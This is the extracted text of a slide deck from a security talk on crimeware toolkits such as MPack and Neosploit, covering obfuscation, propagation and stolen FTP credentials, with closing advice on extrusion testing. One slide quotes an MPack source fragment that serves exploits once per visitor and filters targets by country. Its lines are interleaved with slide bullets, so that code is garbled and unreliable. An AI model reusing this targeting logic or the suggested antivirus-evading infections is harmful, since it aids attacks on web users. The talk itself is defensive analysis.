iamit.org
Who Am I ? (iamit)
iamit.org
Today’s Agenda
• Terminology
• Past vs. Present – 10,000 feet view
• Business Impact
• Key Characteristics – what does it look like?
– Anti-Forensics techniques
– Propagation methods
• What is the motive (what are they looking for)?
• Tying it all up – what does it look like when successful.
• Anything in it for us to learn from?
– Looking forward on extrusion testing methodologies
iamit.org
Some Terminology
iamit.org
Federal Prosecutor: “Cybercrime Is Funding
Organized Crime”
How Does e-Crime get Business Data?
iamit.org
The business impact of E-Crime
Employee
Data
Sophisticated
and Organized Financial
Criminals Data
• Data theft
• Password theft
• Identity theft
• Compromised computers to steal resources
• Employee productivity loss
iamit.org
The Business Impact Of E-Crime
iamit.org
Detection Evasion
• Code obfuscation
– Not the one you are used to…
• Geographical preference
– More on this later when we talk $$$…
iamit.org
Dynamic Code Obfuscation
iamit.org
Dyn. Code Obf. – the neosploit way (2.0.15)
iamit.org
Obfuscation and IFRAMES
iamit.org
Crimeware Toolkits
iamit.org
A glimpse into the code
iamit.org
Neosploit code
iamit.org
Location, Location, Location
index.php
• Have you been to our //checks and saves user's IP hashed with browser
//to avoid future browser's hangup
fine establishment function CheckAddUser() {
…
before? $rcount=@mysql_num_rows($res);
if ($rcount>0) {
– You can only get the //found data, prevent view
echo ":[";
“good” stuff once… exit;
} else {
//not found, add
$query = "INSERT INTO ".$dbstats."_users
VALUES ('".$ipua."')";
mysql_query($query);
}
settings.php:
• Where do you come $BlockDuplicates=1; //send exploits only once
$CountReferers=1; //make referrer's statistics
from? $OnlyDefiniedCoutries=0; //send exploits only to counties in
the list
– You may not be worth $CoutryList="RU US UA"; //2-letter codes ONLY! (see readme
for details)
the effort… Source: Mpack 0.94 source code
iamit.org
Evasive attacks – increasing the infection
rates
iamit.org
Propagation techniques
iamit.org
On My Site? No way!
iamit.org
Way… It’s all business!
iamit.org
And when the business is booming…
iamit.org
And there’s a “no code” trick as well
iamit.org
Happy neighbors…
iamit.org
What’s the end game?
iamit.org
Full-Circle
User Trojan
The last server we analyzed contained more than
infected w. sends
200,000 stolen FTP credentials on it.
Trojan credentials
It had government sites, universities, and fortune 500
companies on it. Credentials used
User attacked
to modify content
while browsing
More than 50% of the credentials were valid…
of websites
iamit.org
Keeping in control
iamit.org
Neosploit
iamit.org
iamit.org
Local Crimeware Effect
• Don’t let your eyes off the ball… (the SSL icon?)
iamit.org
Play-by-play…
iamit.org
Where are we going to?
iamit.org
Trojans 2.0 Illustrated
iamit.org
Old vulnerabilities – old problem
Taken from “Understanding web browser threat: examination of vulnerable online web browser populations
and the ‘insecurity iceberg’”, http://www.techzoom.net/insecurity-iceberg
iamit.org
From the field…
iamit.org
So how do I use this?
• Extrusion Testing
– The ugly half-brother of pen-testing
– Gaining a lot of momentum
– Uses tried-and-tested methods (social engineering, passive
external fingerprinting, work the CEO’s secretary rather than the
security administrator…)
• Arsenal includes:
– Toolkits (told you these things are useful)
– Updated exploits for recent vulnerabilities
– Custom infection (you don’t want to end up being blocked by an
AV when you do have a chance to get in) – not for the faint of
heart.
– Chutzpa (someone come up with an English phrase for it!)
iamit.org
Future directions of web security
iamit.org
Q&A
iamit.org